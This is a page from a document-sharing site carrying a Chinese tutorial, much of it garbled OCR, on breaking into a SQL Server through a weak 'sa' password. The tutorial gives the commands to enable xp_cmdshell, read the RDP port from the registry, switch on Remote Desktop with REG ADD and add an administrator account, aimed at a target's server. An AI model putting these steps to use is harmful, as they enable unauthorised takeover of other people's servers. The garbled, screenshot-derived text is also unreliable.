




版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報或認(rèn)領(lǐng)
文檔簡介
使用SQL弱口令入侵SQL服務(wù)器使用的工具:掃描工具X-scanSQL查詢分析器SQLtools命令集成版環(huán)境:Windowsxp和WindowsServer2003企業(yè)版1、在網(wǎng)絡(luò)內(nèi)掃描到一臺SQLServer服務(wù)器,且sa密碼為弱口令1232、通過SQLtools命令集成版這個軟件,我們可以連上這臺SQLServer服務(wù)器,如下圖所示by:森度撞擊暮SQLTD0LS添度偷令集成版「契U哇接IP地址^2口元口擊端口~惘戶名密碼||123|數(shù)據(jù)庫名[master|蔓]by:森度撞擊-上隹步驟:.本地文件打開j每程路徑L上傳「SHELL'SQL命令:文件管理DIV5HELL安裝命令::dirE*愈每mmam借XP^CMDSHELLrOASHELrJOBSHELLCDI路HELLCSESHELLc:\winnt\gy?tem32^!iias.mdb*TempFilej^\T3tmp.log恢復(fù)DLL路徑|xplog70.dllDLL路徑odsole70.dllDLL路徑|xpstar.dll全部恢復(fù)|員可因通過使用sp_configure啟用液p_CEcJshellL有關(guān)啟用:.'xpjcmdsheir的詳細(xì)信息,請參^SQLServer聯(lián)機叢書中的"外圍應(yīng)用配置器"。ErrorMessage:SQLSener阻止『對組件,xp_cmdshell,的過程,svs.xp_cmdshell"的訪問,因為此組件豈作為此服務(wù)器安全配置的一第分而被關(guān)閉.系統(tǒng)曾理員可也通過使用sp*onfigure啟用\p_cmdsheir<>有關(guān)后用\p_cmdsheir的詳細(xì)信息,請參閱SQLServer聯(lián)機叢書中的H外圍僉用配置器,Ver1.0CuriTiecttosqlserverVer1.03、雖然我們能succeed連接到SQLServer服務(wù)器,但是在我們執(zhí)行dirc:\查看c盤文件時候,可能會報錯,基于這種情況,我們可以使用SQL查詢分析器,修正該錯誤信息4、打開SQLServer查詢分析器,輸入IP地址和sa帳號及密碼5、在查詢分析器里輸入SQL語句,并執(zhí)行SQL語句:;EXECsp_configure'showadvancedoptions',1--;RECONFIGUREWITHOVERRIDE--;EXECsp_configure'xp_cmdshell',1--;RECONFIGUREWITHOVERRIDE--;EXECsp_configure'showadvancedoptions',0--遒SQL查謁會祈器,管,WIH同|S夷:對象網(wǎng)覽囂(0)目1mastermudelmedbtempdb£01(sa)批查詢完成。文件西端輯電)查詢⑥TM(T)窗口⑩幫助01)□□□□目.S-..S-..S-..H-:EXECsp_configure;showadvancedoptions,1:RECONFIGUREWITHOVERRIDE—‘EXECsp_configureKp^mdshell,31:RECONFIGUREWITHOVERSIDE—口結(jié)果6、這時,我們在執(zhí)行dirc:\命令查看c盤下的文件,查詢成功□LL路徑|odsole70.dllDLL路徑|xpstar.dll全部恢復(fù)驅(qū)動器肴中的卷沒有標(biāo)簽-卷的序列號是54D7-6EABM的目錄2010-07-2809:040AUTOEXEC.BAT2010-07-2809:040CONFIG.SYS2010-07-2809:14<DIR>DocumentsaridSettings2010-07-2815:37<DIR>Inetpub2010-07-281&11<DIR>ProgramFiles2010-07-28■16:10<DIR>wir-JDOws2010-07-2809:04<DIR>wmpub?*文件。字節(jié)、在SQLtools工具的dos命令窗口,執(zhí)行netstat-an查看3389端口是否打開8、同時使用SQL命令需要查詢默認(rèn)的3389端口是否已經(jīng)被更改SQl命令查詢3389端口是否被更改:execxp_regread'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp','PortNumber'
9、很顯然,默認(rèn)3389端口沒有被修改,那么我們就可以執(zhí)行dos命令,開啟SQLServer服務(wù)器的3389端口DOS命令:REGADDHKLM\SYSTEM\CurrentControlSet\Control\Terminal""Server/vfDenyTSConnections/tREG_DWORD/d0/f10、再次查詢SQlServer的3389端口是否已經(jīng)打開(很明顯我們已經(jīng)成功開啟對方的3389端口)11、這時我們可以使用我們熟悉的dos命令對該SQLServer服務(wù)器新建用戶,并加入到AdministratorsSQLTOOLS深度命令集成成2009.8.21最后修訂by:SQLTOOLS深度命令集成成2009.8.21最后修訂by:深庚陞擊舊地址端口~]用尸名密碼[?23|數(shù)據(jù)庫名[master連掇-上傳步驟——本地免牛|一”打開J遠(yuǎn)程路徑眼1上傳rSHELL”3命隹:脆!L命會'文件管理DIY.SHELL安裝命令|netlocalgroupatiministratora.ce.shi$/add■[身段£□史頁更"pj^MDSHELLT^ASHELT1J^BSHELlTDIYSHELLCSESHELLc:\wihnt)system32^^asmdb千TempFile0\T3tmp.log—i詼復(fù)j_—■=■―=rDLL路徑xplog70.dllQLL路徑誠松口1"口.創(chuàng)DLL路徑{xpstar.dll全部恢復(fù)12、現(xiàn)在,我們就可以是用遠(yuǎn)程桌面連接這臺SQLServer服務(wù)器了備注:一:現(xiàn)在的SQLServer服務(wù)器弱口令
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 自行車企業(yè)公益項目策劃考核試卷
- 江蘇省揚州市田家炳實驗中學(xué)2025年初三下學(xué)期十月階段性考試試題數(shù)學(xué)試題含解析
- 廊坊師范學(xué)院《中藥分析實驗》2023-2024學(xué)年第一學(xué)期期末試卷
- 天津理工大學(xué)中環(huán)信息學(xué)院《中醫(yī)護(hù)膚理論與技術(shù)》2023-2024學(xué)年第二學(xué)期期末試卷
- 石家莊經(jīng)濟職業(yè)學(xué)院《康復(fù)醫(yī)學(xué)導(dǎo)論》2023-2024學(xué)年第二學(xué)期期末試卷
- 內(nèi)蒙古交通職業(yè)技術(shù)學(xué)院《生物藥物臨床前評價》2023-2024學(xué)年第二學(xué)期期末試卷
- 寧夏理工學(xué)院《韓國語應(yīng)用寫作》2023-2024學(xué)年第二學(xué)期期末試卷
- 江蘇省鎮(zhèn)江丹陽市2025年初三第二次??颊Z文試題試卷含解析
- 麗江職業(yè)技術(shù)學(xué)院《外科學(xué)Ⅰ》2023-2024學(xué)年第一學(xué)期期末試卷
- 遼寧省遼陽市燈塔市2024-2025學(xué)年小升初數(shù)學(xué)自主招生備考卷含解析
- 2025年護(hù)士執(zhí)業(yè)資格考試題庫:護(hù)理教育與培訓(xùn)新生兒護(hù)理試題集
- 水果店運營與管理培訓(xùn)課件
- 2025至2031年中國電機芯片行業(yè)投資前景及策略咨詢研究報告
- 2025年學(xué)校五一跨學(xué)科主題實踐活動方案
- 2024年華中科技大學(xué)招聘職員筆試真題
- 1號卷·A10聯(lián)盟2025屆高三4月質(zhì)檢考物理試題及答案
- 機電自動化試題及答案
- 2025年一級建造師之一建礦業(yè)工程實務(wù)題庫附答案(典型題)
- 甘肅省2025年甘肅高三月考試卷(四4月)(甘肅二診)(數(shù)學(xué)試題+答案)
- 2025年中小學(xué)教師資格考試的重要試題及答案
- 微訓(xùn)練 一文多考 備考高效之詩歌《蘇幕遮?燎沉香》教師版
評論
0/150
提交評論